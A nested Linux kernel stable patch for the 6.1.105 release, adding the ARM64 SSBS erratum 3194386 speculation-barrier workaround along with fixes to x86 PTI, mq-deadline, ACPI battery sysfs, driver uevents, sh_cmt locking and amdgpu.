++| ARM            | Cortex-A78C     | #3324346,3324347| ARM64_ERRATUM_3194386       |
+++----------------+-----------------+-----------------+-----------------------------+
+ | ARM            | Cortex-A510     | #2051678        | ARM64_ERRATUM_2051678       |
+ +----------------+-----------------+-----------------+-----------------------------+
+ | ARM            | Cortex-A510     | #2077057        | ARM64_ERRATUM_2077057       |
+@@ -125,22 +133,50 @@ stable kernels.
+ +----------------+-----------------+-----------------+-----------------------------+
+ | ARM            | Cortex-A710     | #2224489        | ARM64_ERRATUM_2224489       |
+ +----------------+-----------------+-----------------+-----------------------------+
++| ARM            | Cortex-A710     | #3324338        | ARM64_ERRATUM_3194386       |
+++----------------+-----------------+-----------------+-----------------------------+
++| ARM            | Cortex-A720     | #3456091        | ARM64_ERRATUM_3194386       |
+++----------------+-----------------+-----------------+-----------------------------+
++| ARM            | Cortex-A725     | #3456106        | ARM64_ERRATUM_3194386       |
+++----------------+-----------------+-----------------+-----------------------------+
++| ARM            | Cortex-X1       | #3324344        | ARM64_ERRATUM_3194386       |
+++----------------+-----------------+-----------------+-----------------------------+
++| ARM            | Cortex-X1C      | #3324346        | ARM64_ERRATUM_3194386       |
+++----------------+-----------------+-----------------+-----------------------------+
+ | ARM            | Cortex-X2       | #2119858        | ARM64_ERRATUM_2119858       |
+ +----------------+-----------------+-----------------+-----------------------------+
+ | ARM            | Cortex-X2       | #2224489        | ARM64_ERRATUM_2224489       |
+ +----------------+-----------------+-----------------+-----------------------------+
++| ARM            | Cortex-X2       | #3324338        | ARM64_ERRATUM_3194386       |
+++----------------+-----------------+-----------------+-----------------------------+
++| ARM            | Cortex-X3       | #3324335        | ARM64_ERRATUM_3194386       |
+++----------------+-----------------+-----------------+-----------------------------+
++| ARM            | Cortex-X4       | #3194386        | ARM64_ERRATUM_3194386       |
+++----------------+-----------------+-----------------+-----------------------------+
++| ARM            | Cortex-X925     | #3324334        | ARM64_ERRATUM_3194386       |
+++----------------+-----------------+-----------------+-----------------------------+
+ | ARM            | Neoverse-N1     | #1188873,1418040| ARM64_ERRATUM_1418040       |
+ +----------------+-----------------+-----------------+-----------------------------+
+ | ARM            | Neoverse-N1     | #1349291        | N/A                         |
+ +----------------+-----------------+-----------------+-----------------------------+
+ | ARM            | Neoverse-N1     | #1542419        | ARM64_ERRATUM_1542419       |
+ +----------------+-----------------+-----------------+-----------------------------+
++| ARM            | Neoverse-N1     | #3324349        | ARM64_ERRATUM_3194386       |
+++----------------+-----------------+-----------------+-----------------------------+
+ | ARM            | Neoverse-N2     | #2139208        | ARM64_ERRATUM_2139208       |
+ +----------------+-----------------+-----------------+-----------------------------+
+ | ARM            | Neoverse-N2     | #2067961        | ARM64_ERRATUM_2067961       |
+ +----------------+-----------------+-----------------+-----------------------------+
+ | ARM            | Neoverse-N2     | #2253138        | ARM64_ERRATUM_2253138       |
+ +----------------+-----------------+-----------------+-----------------------------+
++| ARM            | Neoverse-N2     | #3324339        | ARM64_ERRATUM_3194386       |
+++----------------+-----------------+-----------------+-----------------------------+
++| ARM            | Neoverse-V1     | #3324341        | ARM64_ERRATUM_3194386       |
+++----------------+-----------------+-----------------+-----------------------------+
++| ARM            | Neoverse-V2     | #3324336        | ARM64_ERRATUM_3194386       |
+++----------------+-----------------+-----------------+-----------------------------+
++| ARM            | Neoverse-V3     | #3312417        | ARM64_ERRATUM_3194386       |
+++----------------+-----------------+-----------------+-----------------------------+
+ | ARM            | MMU-500         | #841119,826419  | N/A                         |
+ +----------------+-----------------+-----------------+-----------------------------+
+ | ARM            | MMU-600         | #1076982,1209401| N/A                         |
+diff --git a/Makefile b/Makefile
+index 0dd963d6d8d26..08ca316cb46dc 100644
+--- a/Makefile
++++ b/Makefile
+@@ -1,7 +1,7 @@
+ # SPDX-License-Identifier: GPL-2.0
+ VERSION = 6
+ PATCHLEVEL = 1
+-SUBLEVEL = 104
++SUBLEVEL = 105
+ EXTRAVERSION =
+ NAME = Curry Ramen
+ 
+diff --git a/arch/arm64/Kconfig b/arch/arm64/Kconfig
+index 044b98a62f7bb..2ef939075039d 100644
+--- a/arch/arm64/Kconfig
++++ b/arch/arm64/Kconfig
+@@ -1000,6 +1000,44 @@ config ARM64_ERRATUM_2966298
+ 
+ 	  If unsure, say Y.
+ 
++config ARM64_ERRATUM_3194386
++	bool "Cortex-*/Neoverse-*: workaround for MSR SSBS not self-synchronizing"
++	default y
++	help
++	  This option adds the workaround for the following errata:
++
++	  * ARM Cortex-A76 erratum 3324349
++	  * ARM Cortex-A77 erratum 3324348
++	  * ARM Cortex-A78 erratum 3324344
++	  * ARM Cortex-A78C erratum 3324346
++	  * ARM Cortex-A78C erratum 3324347
++	  * ARM Cortex-A710 erratam 3324338
++	  * ARM Cortex-A720 erratum 3456091
++	  * ARM Cortex-A725 erratum 3456106
++	  * ARM Cortex-X1 erratum 3324344
++	  * ARM Cortex-X1C erratum 3324346
++	  * ARM Cortex-X2 erratum 3324338
++	  * ARM Cortex-X3 erratum 3324335
++	  * ARM Cortex-X4 erratum 3194386
++	  * ARM Cortex-X925 erratum 3324334
++	  * ARM Neoverse-N1 erratum 3324349
++	  * ARM Neoverse N2 erratum 3324339
++	  * ARM Neoverse-V1 erratum 3324341
++	  * ARM Neoverse V2 erratum 3324336
++	  * ARM Neoverse-V3 erratum 3312417
++
++	  On affected cores "MSR SSBS, #0" instructions may not affect
++	  subsequent speculative instructions, which may permit unexepected
++	  speculative store bypassing.
++
++	  Work around this problem by placing a Speculation Barrier (SB) or
++	  Instruction Synchronization Barrier (ISB) after kernel changes to
++	  SSBS. The presence of the SSBS special-purpose register is hidden
++	  from hwcaps and EL0 reads of ID_AA64PFR1_EL1, such that userspace
++	  will use the PR_SPEC_STORE_BYPASS prctl to change SSBS.
++
++	  If unsure, say Y.
++
+ config CAVIUM_ERRATUM_22375
+ 	bool "Cavium erratum 22375, 24313"
+ 	default y
+diff --git a/arch/arm64/include/asm/barrier.h b/arch/arm64/include/asm/barrier.h
+index 2cfc4245d2e2d..e22ec44d50f5f 100644
+--- a/arch/arm64/include/asm/barrier.h
++++ b/arch/arm64/include/asm/barrier.h
+@@ -38,6 +38,10 @@
+  */
+ #define dgh()		asm volatile("hint #6" : : : "memory")
+ 
++#define spec_bar()	asm volatile(ALTERNATIVE("dsb nsh\nisb\n",		\
++						 SB_BARRIER_INSN"nop\n",	\
++						 ARM64_HAS_SB))
++
+ #ifdef CONFIG_ARM64_PSEUDO_NMI
+ #define pmr_sync()						\
+ 	do {							\
+diff --git a/arch/arm64/include/asm/cputype.h b/arch/arm64/include/asm/cputype.h
+index af3a678a76b3a..a0a028a6b9670 100644
+--- a/arch/arm64/include/asm/cputype.h
++++ b/arch/arm64/include/asm/cputype.h
+@@ -85,6 +85,14 @@
+ #define ARM_CPU_PART_CORTEX_X2		0xD48
+ #define ARM_CPU_PART_NEOVERSE_N2	0xD49
+ #define ARM_CPU_PART_CORTEX_A78C	0xD4B
++#define ARM_CPU_PART_CORTEX_X1C		0xD4C
++#define ARM_CPU_PART_CORTEX_X3		0xD4E
++#define ARM_CPU_PART_NEOVERSE_V2	0xD4F
++#define ARM_CPU_PART_CORTEX_A720	0xD81
++#define ARM_CPU_PART_CORTEX_X4		0xD82
++#define ARM_CPU_PART_NEOVERSE_V3	0xD84
++#define ARM_CPU_PART_CORTEX_X925	0xD85
++#define ARM_CPU_PART_CORTEX_A725	0xD87
+ 
+ #define APM_CPU_PART_XGENE		0x000
+ #define APM_CPU_VAR_POTENZA		0x00
+@@ -151,6 +159,14 @@
+ #define MIDR_CORTEX_X2 MIDR_CPU_MODEL(ARM_CPU_IMP_ARM, ARM_CPU_PART_CORTEX_X2)
+ #define MIDR_NEOVERSE_N2 MIDR_CPU_MODEL(ARM_CPU_IMP_ARM, ARM_CPU_PART_NEOVERSE_N2)
+ #define MIDR_CORTEX_A78C	MIDR_CPU_MODEL(ARM_CPU_IMP_ARM, ARM_CPU_PART_CORTEX_A78C)
++#define MIDR_CORTEX_X1C	MIDR_CPU_MODEL(ARM_CPU_IMP_ARM, ARM_CPU_PART_CORTEX_X1C)
++#define MIDR_CORTEX_X3 MIDR_CPU_MODEL(ARM_CPU_IMP_ARM, ARM_CPU_PART_CORTEX_X3)
++#define MIDR_NEOVERSE_V2 MIDR_CPU_MODEL(ARM_CPU_IMP_ARM, ARM_CPU_PART_NEOVERSE_V2)
++#define MIDR_CORTEX_A720 MIDR_CPU_MODEL(ARM_CPU_IMP_ARM, ARM_CPU_PART_CORTEX_A720)
++#define MIDR_CORTEX_X4 MIDR_CPU_MODEL(ARM_CPU_IMP_ARM, ARM_CPU_PART_CORTEX_X4)
++#define MIDR_NEOVERSE_V3 MIDR_CPU_MODEL(ARM_CPU_IMP_ARM, ARM_CPU_PART_NEOVERSE_V3)
++#define MIDR_CORTEX_X925 MIDR_CPU_MODEL(ARM_CPU_IMP_ARM, ARM_CPU_PART_CORTEX_X925)
++#define MIDR_CORTEX_A725 MIDR_CPU_MODEL(ARM_CPU_IMP_ARM, ARM_CPU_PART_CORTEX_A725)
+ #define MIDR_THUNDERX	MIDR_CPU_MODEL(ARM_CPU_IMP_CAVIUM, CAVIUM_CPU_PART_THUNDERX)
+ #define MIDR_THUNDERX_81XX MIDR_CPU_MODEL(ARM_CPU_IMP_CAVIUM, CAVIUM_CPU_PART_THUNDERX_81XX)
+ #define MIDR_THUNDERX_83XX MIDR_CPU_MODEL(ARM_CPU_IMP_CAVIUM, CAVIUM_CPU_PART_THUNDERX_83XX)
+diff --git a/arch/arm64/kernel/cpu_errata.c b/arch/arm64/kernel/cpu_errata.c
+index 74584597bfb82..7640031e1b845 100644
+--- a/arch/arm64/kernel/cpu_errata.c
++++ b/arch/arm64/kernel/cpu_errata.c
+@@ -435,6 +435,30 @@ static struct midr_range broken_aarch32_aes[] = {
+ };
+ #endif /* CONFIG_ARM64_WORKAROUND_TRBE_WRITE_OUT_OF_RANGE */
+ 
++#ifdef CONFIG_ARM64_ERRATUM_3194386
++static const struct midr_range erratum_spec_ssbs_list[] = {
++	MIDR_ALL_VERSIONS(MIDR_CORTEX_A76),
++	MIDR_ALL_VERSIONS(MIDR_CORTEX_A77),
++	MIDR_ALL_VERSIONS(MIDR_CORTEX_A78),
++	MIDR_ALL_VERSIONS(MIDR_CORTEX_A78C),
++	MIDR_ALL_VERSIONS(MIDR_CORTEX_A710),
++	MIDR_ALL_VERSIONS(MIDR_CORTEX_A720),
++	MIDR_ALL_VERSIONS(MIDR_CORTEX_A725),
++	MIDR_ALL_VERSIONS(MIDR_CORTEX_X1),
++	MIDR_ALL_VERSIONS(MIDR_CORTEX_X1C),
++	MIDR_ALL_VERSIONS(MIDR_CORTEX_X2),
++	MIDR_ALL_VERSIONS(MIDR_CORTEX_X3),
++	MIDR_ALL_VERSIONS(MIDR_CORTEX_X4),
++	MIDR_ALL_VERSIONS(MIDR_CORTEX_X925),
++	MIDR_ALL_VERSIONS(MIDR_NEOVERSE_N1),
++	MIDR_ALL_VERSIONS(MIDR_NEOVERSE_N2),
++	MIDR_ALL_VERSIONS(MIDR_NEOVERSE_V1),
++	MIDR_ALL_VERSIONS(MIDR_NEOVERSE_V2),
++	MIDR_ALL_VERSIONS(MIDR_NEOVERSE_V3),
++	{}
++};
++#endif
++
+ const struct arm64_cpu_capabilities arm64_errata[] = {
+ #ifdef CONFIG_ARM64_WORKAROUND_CLEAN_CACHE
+ 	{
+@@ -726,6 +750,13 @@ const struct arm64_cpu_capabilities arm64_errata[] = {
+ 		.cpu_enable = cpu_clear_bf16_from_user_emulation,
+ 	},
+ #endif
++#ifdef CONFIG_ARM64_ERRATUM_3194386
++	{
++		.desc = "SSBS not fully self-synchronizing",
++		.capability = ARM64_WORKAROUND_SPECULATIVE_SSBS,
++		ERRATA_MIDR_RANGE_LIST(erratum_spec_ssbs_list),
++	},
++#endif
+ #ifdef CONFIG_ARM64_WORKAROUND_SPECULATIVE_UNPRIV_LOAD
+ 	{
+ 		.desc = "ARM erratum 2966298",
+diff --git a/arch/arm64/kernel/cpufeature.c b/arch/arm64/kernel/cpufeature.c
+index 770a31c6ed81b..840cc48b5147b 100644
+--- a/arch/arm64/kernel/cpufeature.c
++++ b/arch/arm64/kernel/cpufeature.c
+@@ -2084,6 +2084,17 @@ static void cpu_enable_mte(struct arm64_cpu_capabilities const *cap)
+ }
+ #endif /* CONFIG_ARM64_MTE */
+ 
++static void user_feature_fixup(void)
++{
++	if (cpus_have_cap(ARM64_WORKAROUND_SPECULATIVE_SSBS)) {
++		struct arm64_ftr_reg *regp;
++
++		regp = get_arm64_ftr_reg(SYS_ID_AA64PFR1_EL1);
++		if (regp)
++			regp->user_mask &= ~ID_AA64PFR1_EL1_SSBS_MASK;
++	}
++}
++
+ static void elf_hwcap_fixup(void)
+ {
+ #ifdef CONFIG_ARM64_ERRATUM_1742098
+@@ -3284,6 +3295,7 @@ void __init setup_cpu_features(void)
+ 	u32 cwg;
+ 
+ 	setup_system_capabilities();
++	user_feature_fixup();
+ 	setup_elf_hwcaps(arm64_elf_hwcaps);
+ 
+ 	if (system_supports_32bit_el0()) {
+diff --git a/arch/arm64/kernel/proton-pack.c b/arch/arm64/kernel/proton-pack.c
+index bfce41c2a53b3..2df5e43ae4d14 100644
+--- a/arch/arm64/kernel/proton-pack.c
++++ b/arch/arm64/kernel/proton-pack.c
+@@ -570,6 +570,18 @@ static enum mitigation_state spectre_v4_enable_hw_mitigation(void)
+ 
+ 	/* SCTLR_EL1.DSSBS was initialised to 0 during boot */
+ 	set_pstate_ssbs(0);
++
++	/*
++	 * SSBS is self-synchronizing and is intended to affect subsequent
++	 * speculative instructions, but some CPUs can speculate with a stale
++	 * value of SSBS.
++	 *
++	 * Mitigate this with an unconditional speculation barrier, as CPUs
++	 * could mis-speculate branches and bypass a conditional barrier.
++	 */
++	if (IS_ENABLED(CONFIG_ARM64_ERRATUM_3194386))
++		spec_bar();
++
+ 	return SPECTRE_MITIGATED;
+ }
+ 
+diff --git a/arch/arm64/tools/cpucaps b/arch/arm64/tools/cpucaps
+index 2dc7ddee5f044..f5c9a4f5f7226 100644
+--- a/arch/arm64/tools/cpucaps
++++ b/arch/arm64/tools/cpucaps
+@@ -86,4 +86,5 @@ WORKAROUND_NVIDIA_CARMEL_CNP
+ WORKAROUND_QCOM_FALKOR_E1003
+ WORKAROUND_REPEAT_TLBI
+ WORKAROUND_SPECULATIVE_AT
++WORKAROUND_SPECULATIVE_SSBS
+ WORKAROUND_SPECULATIVE_UNPRIV_LOAD
+diff --git a/arch/x86/kernel/cpu/mtrr/mtrr.c b/arch/x86/kernel/cpu/mtrr/mtrr.c
+index 2746cac9d8a94..dbebb646c9fc6 100644
+--- a/arch/x86/kernel/cpu/mtrr/mtrr.c
++++ b/arch/x86/kernel/cpu/mtrr/mtrr.c
+@@ -816,7 +816,7 @@ void mtrr_save_state(void)
+ {
+ 	int first_cpu;
+ 
+-	if (!mtrr_enabled())
++	if (!mtrr_enabled() || !mtrr_state.have_fixed)
+ 		return;
+ 
+ 	first_cpu = cpumask_first(cpu_online_mask);
+diff --git a/arch/x86/mm/pti.c b/arch/x86/mm/pti.c
+index 78414c6d1b5ed..7b804c34c0201 100644
+--- a/arch/x86/mm/pti.c
++++ b/arch/x86/mm/pti.c
+@@ -374,14 +374,14 @@ pti_clone_pgtable(unsigned long start, unsigned long end,
+ 			 */
+ 			*target_pmd = *pmd;
+ 
+-			addr += PMD_SIZE;
++			addr = round_up(addr + 1, PMD_SIZE);
+ 
+ 		} else if (level == PTI_CLONE_PTE) {
+ 
+ 			/* Walk the page-table down to the pte level */
+ 			pte = pte_offset_kernel(pmd, addr);
+ 			if (pte_none(*pte)) {
+-				addr += PAGE_SIZE;
++				addr = round_up(addr + 1, PAGE_SIZE);
+ 				continue;
+ 			}
+ 
+@@ -401,7 +401,7 @@ pti_clone_pgtable(unsigned long start, unsigned long end,
+ 			/* Clone the PTE */
+ 			*target_pte = *pte;
+ 
+-			addr += PAGE_SIZE;
++			addr = round_up(addr + 1, PAGE_SIZE);
+ 
+ 		} else {
+ 			BUG();
+@@ -496,7 +496,7 @@ static void pti_clone_entry_text(void)
+ {
+ 	pti_clone_pgtable((unsigned long) __entry_text_start,
+ 			  (unsigned long) __entry_text_end,
+-			  PTI_CLONE_PMD);
++			  PTI_LEVEL_KERNEL_IMAGE);
+ }
+ 
+ /*
+diff --git a/block/blk-mq.c b/block/blk-mq.c
+index 3afa5c8d165b1..daf0e4f3444e7 100644
+--- a/block/blk-mq.c
++++ b/block/blk-mq.c
+@@ -439,6 +439,7 @@ __blk_mq_alloc_requests_batch(struct blk_mq_alloc_data *data,
+ 
+ static struct request *__blk_mq_alloc_requests(struct blk_mq_alloc_data *data)
+ {
++	void (*limit_depth)(blk_opf_t, struct blk_mq_alloc_data *) = NULL;
+ 	struct request_queue *q = data->q;
+ 	u64 alloc_time_ns = 0;
+ 	struct request *rq;
+@@ -465,7 +466,7 @@ static struct request *__blk_mq_alloc_requests(struct blk_mq_alloc_data *data)
+ 		    !blk_op_is_passthrough(data->cmd_flags) &&
+ 		    e->type->ops.limit_depth &&
+ 		    !(data->flags & BLK_MQ_REQ_RESERVED))
+-			e->type->ops.limit_depth(data->cmd_flags, data);
++			limit_depth = e->type->ops.limit_depth;
+ 	}
+ 
+ retry:
+@@ -477,6 +478,9 @@ static struct request *__blk_mq_alloc_requests(struct blk_mq_alloc_data *data)
+ 	if (data->flags & BLK_MQ_REQ_RESERVED)
+ 		data->rq_flags |= RQF_RESV;
+ 
++	if (limit_depth)
++		limit_depth(data->cmd_flags, data);
++
+ 	/*
+ 	 * Try batched alloc if we want more than 1 tag.
+ 	 */
+diff --git a/block/mq-deadline.c b/block/mq-deadline.c
+index f10c2a0d18d41..ff029e1acc4d5 100644
+--- a/block/mq-deadline.c
++++ b/block/mq-deadline.c
+@@ -597,6 +597,20 @@ static struct request *dd_dispatch_request(struct blk_mq_hw_ctx *hctx)
+ 	return rq;
+ }
+ 
++/*
++ * 'depth' is a number in the range 1..INT_MAX representing a number of
++ * requests. Scale it with a factor (1 << bt->sb.shift) / q->nr_requests since
++ * 1..(1 << bt->sb.shift) is the range expected by sbitmap_get_shallow().
++ * Values larger than q->nr_requests have the same effect as q->nr_requests.
++ */
++static int dd_to_word_depth(struct blk_mq_hw_ctx *hctx, unsigned int qdepth)
++{
++	struct sbitmap_queue *bt = &hctx->sched_tags->bitmap_tags;
++	const unsigned int nrr = hctx->queue->nr_requests;
++
++	return ((qdepth << bt->sb.shift) + nrr - 1) / nrr;
++}
++
+ /*
+  * Called by __blk_mq_alloc_request(). The shallow_depth value set by this
+  * function is used by __blk_mq_get_tag().
+@@ -613,7 +627,7 @@ static void dd_limit_depth(blk_opf_t opf, struct blk_mq_alloc_data *data)
+ 	 * Throttle asynchronous requests and writes such that these requests
+ 	 * do not block the allocation of synchronous requests.
+ 	 */
+-	data->shallow_depth = dd->async_depth;
++	data->shallow_depth = dd_to_word_depth(data->hctx, dd->async_depth);
+ }
+ 
+ /* Called by blk_mq_update_nr_requests(). */
+@@ -623,9 +637,9 @@ static void dd_depth_updated(struct blk_mq_hw_ctx *hctx)
+ 	struct deadline_data *dd = q->elevator->elevator_data;
+ 	struct blk_mq_tags *tags = hctx->sched_tags;
+ 
+-	dd->async_depth = max(1UL, 3 * q->nr_requests / 4);
++	dd->async_depth = q->nr_requests;
+ 
+-	sbitmap_queue_min_shallow_depth(&tags->bitmap_tags, dd->async_depth);
++	sbitmap_queue_min_shallow_depth(&tags->bitmap_tags, 1);
+ }
+ 
+ /* Called by blk_mq_init_hctx() and blk_mq_init_sched(). */
+diff --git a/drivers/acpi/battery.c b/drivers/acpi/battery.c
+index 084f156bdfbc4..088740fdea355 100644
+--- a/drivers/acpi/battery.c
++++ b/drivers/acpi/battery.c
+@@ -667,12 +667,18 @@ static ssize_t acpi_battery_alarm_store(struct device *dev,
+ 	return count;
+ }
+ 
+-static const struct device_attribute alarm_attr = {
++static struct device_attribute alarm_attr = {
+ 	.attr = {.name = "alarm", .mode = 0644},
+ 	.show = acpi_battery_alarm_show,
+ 	.store = acpi_battery_alarm_store,
+ };
+ 
++static struct attribute *acpi_battery_attrs[] = {
++	&alarm_attr.attr,
++	NULL
++};
++ATTRIBUTE_GROUPS(acpi_battery);
++
+ /*
+  * The Battery Hooking API
+  *
+@@ -809,7 +815,10 @@ static void __exit battery_hook_exit(void)
+ 
+ static int sysfs_add_battery(struct acpi_battery *battery)
+ {
+-	struct power_supply_config psy_cfg = { .drv_data = battery, };
++	struct power_supply_config psy_cfg = {
++		.drv_data = battery,
++		.attr_grp = acpi_battery_groups,
++	};
+ 	bool full_cap_broken = false;
+ 
+ 	if (!ACPI_BATTERY_CAPACITY_VALID(battery->full_charge_capacity) &&
+@@ -854,7 +863,7 @@ static int sysfs_add_battery(struct acpi_battery *battery)
+ 		return result;
+ 	}
+ 	battery_hook_add_battery(battery);
+-	return device_create_file(&battery->bat->dev, &alarm_attr);
++	return 0;
+ }
+ 
+ static void sysfs_remove_battery(struct acpi_battery *battery)
+@@ -865,7 +874,6 @@ static void sysfs_remove_battery(struct acpi_battery *battery)
+ 		return;
+ 	}
+ 	battery_hook_remove_battery(battery);
+-	device_remove_file(&battery->bat->dev, &alarm_attr);
+ 	power_supply_unregister(battery->bat);
+ 	battery->bat = NULL;
+ 	mutex_unlock(&battery->sysfs_lock);
+diff --git a/drivers/acpi/sbs.c b/drivers/acpi/sbs.c
+index e6a01a8df1b81..7c0eba1a37d87 100644
+--- a/drivers/acpi/sbs.c
++++ b/drivers/acpi/sbs.c
+@@ -77,7 +77,6 @@ struct acpi_battery {
+ 	u16 spec;
+ 	u8 id;
+ 	u8 present:1;
+-	u8 have_sysfs_alarm:1;
+ };
+ 
+ #define to_acpi_battery(x) power_supply_get_drvdata(x)
+@@ -462,12 +461,18 @@ static ssize_t acpi_battery_alarm_store(struct device *dev,
+ 	return count;
+ }
+ 
+-static const struct device_attribute alarm_attr = {
++static struct device_attribute alarm_attr = {
+ 	.attr = {.name = "alarm", .mode = 0644},
+ 	.show = acpi_battery_alarm_show,
+ 	.store = acpi_battery_alarm_store,
+ };
+ 
++static struct attribute *acpi_battery_attrs[] = {
++	&alarm_attr.attr,
++	NULL
++};
++ATTRIBUTE_GROUPS(acpi_battery);
++
+ /* --------------------------------------------------------------------------
+                                  Driver Interface
+    -------------------------------------------------------------------------- */
+@@ -509,7 +514,10 @@ static int acpi_battery_read(struct acpi_battery *battery)
+ static int acpi_battery_add(struct acpi_sbs *sbs, int id)
+ {
+ 	struct acpi_battery *battery = &sbs->battery[id];
+-	struct power_supply_config psy_cfg = { .drv_data = battery, };
++	struct power_supply_config psy_cfg = {
++		.drv_data = battery,
++		.attr_grp = acpi_battery_groups,
++	};
+ 	int result;
+ 
+ 	battery->id = id;
+@@ -539,10 +547,6 @@ static int acpi_battery_add(struct acpi_sbs *sbs, int id)
+ 		goto end;
+ 	}
+ 
+-	result = device_create_file(&battery->bat->dev, &alarm_attr);
+-	if (result)
+-		goto end;
+-	battery->have_sysfs_alarm = 1;
+       end:
+ 	pr_info("%s [%s]: Battery Slot [%s] (battery %s)\n",
+ 	       ACPI_SBS_DEVICE_NAME, acpi_device_bid(sbs->device),
+@@ -554,11 +558,8 @@ static void acpi_battery_remove(struct acpi_sbs *sbs, int id)
+ {
+ 	struct acpi_battery *battery = &sbs->battery[id];
+ 
+-	if (battery->bat) {
+-		if (battery->have_sysfs_alarm)
+-			device_remove_file(&battery->bat->dev, &alarm_attr);
++	if (battery->bat)
+ 		power_supply_unregister(battery->bat);
+-	}
+ }
+ 
+ static int acpi_charger_add(struct acpi_sbs *sbs)
+diff --git a/drivers/base/core.c b/drivers/base/core.c
+index 30204e62497c2..1de19cecaa622 100644
+--- a/drivers/base/core.c
++++ b/drivers/base/core.c
+@@ -25,6 +25,7 @@
+ #include <linux/mutex.h>
+ #include <linux/pm_runtime.h>
+ #include <linux/netdevice.h>
++#include <linux/rcupdate.h>
+ #include <linux/sched/signal.h>
+ #include <linux/sched/mm.h>
+ #include <linux/swiotlb.h>
+@@ -2558,6 +2559,7 @@ static const char *dev_uevent_name(struct kobject *kobj)
+ static int dev_uevent(struct kobject *kobj, struct kobj_uevent_env *env)
+ {
+ 	struct device *dev = kobj_to_dev(kobj);
++	struct device_driver *driver;
+ 	int retval = 0;
+ 
+ 	/* add device node properties if present */
+@@ -2586,8 +2588,12 @@ static int dev_uevent(struct kobject *kobj, struct kobj_uevent_env *env)
+ 	if (dev->type && dev->type->name)
+ 		add_uevent_var(env, "DEVTYPE=%s", dev->type->name);
+ 
+-	if (dev->driver)
+-		add_uevent_var(env, "DRIVER=%s", dev->driver->name);
++	/* Synchronize with module_remove_driver() */
++	rcu_read_lock();
++	driver = READ_ONCE(dev->driver);
++	if (driver)
++		add_uevent_var(env, "DRIVER=%s", driver->name);
++	rcu_read_unlock();
+ 
+ 	/* Add common DT information about the device */
+ 	of_device_uevent(dev, env);
+@@ -2657,11 +2663,8 @@ static ssize_t uevent_show(struct device *dev, struct device_attribute *attr,
+ 	if (!env)
+ 		return -ENOMEM;
+ 
+-	/* Synchronize with really_probe() */
+-	device_lock(dev);
+ 	/* let the kset specific function add its keys */
+ 	retval = kset->uevent_ops->uevent(&dev->kobj, env);
+-	device_unlock(dev);
+ 	if (retval)
+ 		goto out;
+ 
+diff --git a/drivers/base/module.c b/drivers/base/module.c
+index 46ad4d636731d..851cc5367c04c 100644
+--- a/drivers/base/module.c
++++ b/drivers/base/module.c
+@@ -7,6 +7,7 @@
+ #include <linux/errno.h>
+ #include <linux/slab.h>
+ #include <linux/string.h>
++#include <linux/rcupdate.h>
+ #include "base.h"
+ 
+ static char *make_driver_name(struct device_driver *drv)
+@@ -77,6 +78,9 @@ void module_remove_driver(struct device_driver *drv)
+ 	if (!drv)
+ 		return;
+ 
++	/* Synchronize with dev_uevent() */
++	synchronize_rcu();
++
+ 	sysfs_remove_link(&drv->p->kobj, "module");
+ 
+ 	if (drv->owner)
+diff --git a/drivers/bus/mhi/host/pci_generic.c b/drivers/bus/mhi/host/pci_generic.c
+index caa4ce28cf9e5..d01080b21da6e 100644
+--- a/drivers/bus/mhi/host/pci_generic.c
++++ b/drivers/bus/mhi/host/pci_generic.c
+@@ -553,6 +553,9 @@ static const struct pci_device_id mhi_pci_id_table[] = {
+ 	/* Telit FN990 */
+ 	{ PCI_DEVICE_SUB(PCI_VENDOR_ID_QCOM, 0x0308, 0x1c5d, 0x2010),
+ 		.driver_data = (kernel_ulong_t) &mhi_telit_fn990_info },
++	/* Telit FE990 */
++	{ PCI_DEVICE_SUB(PCI_VENDOR_ID_QCOM, 0x0308, 0x1c5d, 0x2015),
++		.driver_data = (kernel_ulong_t) &mhi_telit_fn990_info },
+ 	{ PCI_DEVICE(PCI_VENDOR_ID_QCOM, 0x0308),
+ 		.driver_data = (kernel_ulong_t) &mhi_qcom_sdx65_info },
+ 	{ PCI_DEVICE(0x1eac, 0x1001), /* EM120R-GL (sdx24) */
+diff --git a/drivers/clocksource/sh_cmt.c b/drivers/clocksource/sh_cmt.c
+index 7b952aa52c0b9..7a2b83157bf5f 100644
+--- a/drivers/clocksource/sh_cmt.c
++++ b/drivers/clocksource/sh_cmt.c
+@@ -529,6 +529,7 @@ static void sh_cmt_set_next(struct sh_cmt_channel *ch, unsigned long delta)
+ static irqreturn_t sh_cmt_interrupt(int irq, void *dev_id)
+ {
+ 	struct sh_cmt_channel *ch = dev_id;
++	unsigned long flags;
+ 
+ 	/* clear flags */
+ 	sh_cmt_write_cmcsr(ch, sh_cmt_read_cmcsr(ch) &
+@@ -559,6 +560,8 @@ static irqreturn_t sh_cmt_interrupt(int irq, void *dev_id)
+ 
+ 	ch->flags &= ~FLAG_SKIPEVENT;
+ 
++	raw_spin_lock_irqsave(&ch->lock, flags);
++
+ 	if (ch->flags & FLAG_REPROGRAM) {
+ 		ch->flags &= ~FLAG_REPROGRAM;
+ 		sh_cmt_clock_event_program_verify(ch, 1);
+@@ -571,6 +574,8 @@ static irqreturn_t sh_cmt_interrupt(int irq, void *dev_id)
+ 
+ 	ch->flags &= ~FLAG_IRQCONTEXT;
+ 
++	raw_spin_unlock_irqrestore(&ch->lock, flags);
++
+ 	return IRQ_HANDLED;
+ }
+ 
+@@ -781,12 +786,18 @@ static int sh_cmt_clock_event_next(unsigned long delta,
+ 				   struct clock_event_device *ced)
+ {
+ 	struct sh_cmt_channel *ch = ced_to_sh_cmt(ced);
++	unsigned long flags;
+ 
+ 	BUG_ON(!clockevent_state_oneshot(ced));
++
++	raw_spin_lock_irqsave(&ch->lock, flags);
++
+ 	if (likely(ch->flags & FLAG_IRQCONTEXT))
+ 		ch->next_match_value = delta - 1;
+ 	else
+-		sh_cmt_set_next(ch, delta - 1);
++		__sh_cmt_set_next(ch, delta - 1);
++
++	raw_spin_unlock_irqrestore(&ch->lock, flags);
+ 
+ 	return 0;
+ }
+diff --git a/drivers/gpu/drm/amd/amdgpu/amdgpu_device.c b/drivers/gpu/drm/amd/amdgpu/amdgpu_device.c
+index d4faa489bd5fa..4d1c2eb63090f 100644
+--- a/drivers/gpu/drm/amd/amdgpu/amdgpu_device.c
++++ b/drivers/gpu/drm/amd/amdgpu/amdgpu_device.c
+@@ -3631,6 +3631,7 @@ int amdgpu_device_init(struct amdgpu_device *adev,
+ 	mutex_init(&adev->grbm_idx_mutex);
+ 	mutex_init(&adev->mn_lock);
+ 	mutex_init(&adev->virt.vf_errors.lock);
++	mutex_init(&adev->virt.rlcg_reg_lock);
+ 	hash_init(adev->mn_hash);
+ 	mutex_init(&adev->psp.mutex);
+ 	mutex_init(&adev->notifier_lock);
